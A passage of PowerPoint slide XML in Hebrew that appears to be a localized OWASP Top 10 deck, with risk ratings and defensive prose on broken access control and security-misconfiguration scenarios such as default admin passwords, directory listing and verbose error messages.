                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת ניצול: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחות: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת גילוי: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה טכנית: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1260000">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ניצול בקרת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> גישה הינה יכולת מרכזית של תוקפים. כלי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> עשויים לגלות מחסור בבקרת גישה אך לא יכולים לוודא האם היא באמת פועלת כאשר היא קיימת. בקרת גישה ניתנת לזיהוי באמצעים ידניים, או בכלים ממוכנים במסגרות עבודה מסוימות.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חולשות בבקרת גישה נפוצות בשל המחסור בכלי בדיקה ממוכנים, וכן המחסור בכלי בדיקות פונקציונאליות יעילים ע"י המפתחים.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כלי זיהוי בקרת גישה לרוב אינם מקובלים בביצוע בדיקות ממכונות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> בצורה סטאטית או דינאמית. בדיקה ידנית הינה הדרך הטובה ביותר לזיהוי בקרת גישה חסרה או בלתי יעילה, לרבות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>HTTP method</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (כגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>GET</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> לעומת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PUT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> וכו'), בקרים, הפנייה ישירה לאובייקטים ועוד.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ההשפעה הטכנית הינה תוקפים הפועלים בשם משתמשים או מנהלי מערכת, או משתמשים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> בעלי הרשאות יתרות, או היכולת ליצור, לגשת, לעדכן או למחוק כל רשומה.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ההשפעה העסקית תלויה בבקרות הנדרשות ליישום או לנתונים.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19114911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Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="6372000"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>דוגמאות לתרחישי תקיפה</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> שרת האפליקציה מגיע עם דוגמאות של יישומים אשר אינן נמחקות משרת הייצור. דוגמאות אלו מכילות חולשות הידועות לתוקפים על-מנת לחבל בשרת. במידה ואחד היישומים הינו ממשק הניהול, וחשבונות ברירת המחדל לא משתנים, התוקף מזדהה באמצעות סיסמאות ברירת המחדל ומשתלט על השרת.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> האפשרות לצפות במבנה התיקיות אינה מבוטלת. תוקף מגלה שהוא מסוגל לצפות בתיקיות. התוקף מוצא ומוריד קוד </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> שעבר קימפול, מבצע תהליך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reverse engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> על-מנת לצפות בקוד המקור. התוקף מוצא חולשה חמורה בתהליך בקרת הגישה ביישום.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> הגדרות שרת האפליקציה חושפות הודעות שגיאה מפורטות, לדוגמא </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stack traces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, אשר חוזרות למשתמשים. הדבר חושף מידע רגיש או חולשות אחרות כגון גרסאות של רכיבי מערכת בעלי חולשות ידועות.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ספק שירותי ענן חושף הרשאות שיתוף מתירניות מכיוון האינטרנט כברירת מחדל למשתמשים אחרים של אותו ספק. הדבר מאפשר גישה למידע רגיש המאוחסן בשירות אחסון הקבצים בענן.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="3132000"/>
            <a:ext cx="3383280" cy="316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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם היישום פגיע?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
